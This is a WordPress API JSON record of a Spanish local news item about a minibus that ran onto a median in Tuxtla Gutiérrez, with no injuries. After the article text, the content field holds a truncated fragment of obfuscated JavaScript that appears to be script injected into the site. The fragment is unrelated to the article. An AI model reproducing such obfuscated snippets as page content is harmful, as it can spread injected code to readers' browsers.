{"id":13906,"date":"2024-01-31T22:01:28","date_gmt":"2024-01-31T22:01:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13906"},"modified":"2024-01-31T22:01:29","modified_gmt":"2024-01-31T22:01:29","slug":"se-accidenta-colectivo-en-la-zona-oriente-de-tuxtla-gutierrez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13906","title":{"rendered":"Se accidenta colectivo en la zona Oriente de Tuxtla Guti\u00e9rrez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"637\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1706738417823.jpg\" alt=\"\" class=\"wp-image-13907\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1706738417823.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1706738417823-300x249.jpg 300w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 31 de enero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un colectivo de la ruta 47 con n\u00famero econ\u00f3mico 10 protagoniz\u00f3 un accidente de tr\u00e1nsito en la prolongaci\u00f3n de la 5a Norte de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de la Urvan Nissan de nombre Luis \u00c1ngel circulaba en el sentido de Poniente a Oriente y al llegar a la altura de Convivencia Infantil perdi\u00f3 el control y subi\u00f3 al camell\u00f3n central.El chofer dijo que, al ir conduciendo otro carro le cerr\u00f3 el paso y se vio obligado a dar un volantazo y fue a dar sobre unos tri\u00e1ngulos de concreto y una llanta qued\u00f3 al aire.Afortunadamente no hubo lesionados y una gr\u00faa se encarg\u00f3 de apoyar para poner la unidad sobre la cinta asf\u00e1ltica.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 31 de enero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un colectivo de la ruta 47 con n\u00famero econ\u00f3mico 10 protagoniz\u00f3 un accidente de tr\u00e1nsito en la prolongaci\u00f3n de la 5a Norte de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de la Urvan Nissan de nombre Luis \u00c1ngel circulaba &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13907,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-13906","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13906","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13906"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13906\/revisions"}],"predecessor-version":[{"id":13908,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13906\/revisions\/13908"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13907"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13906"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13906"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13906"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}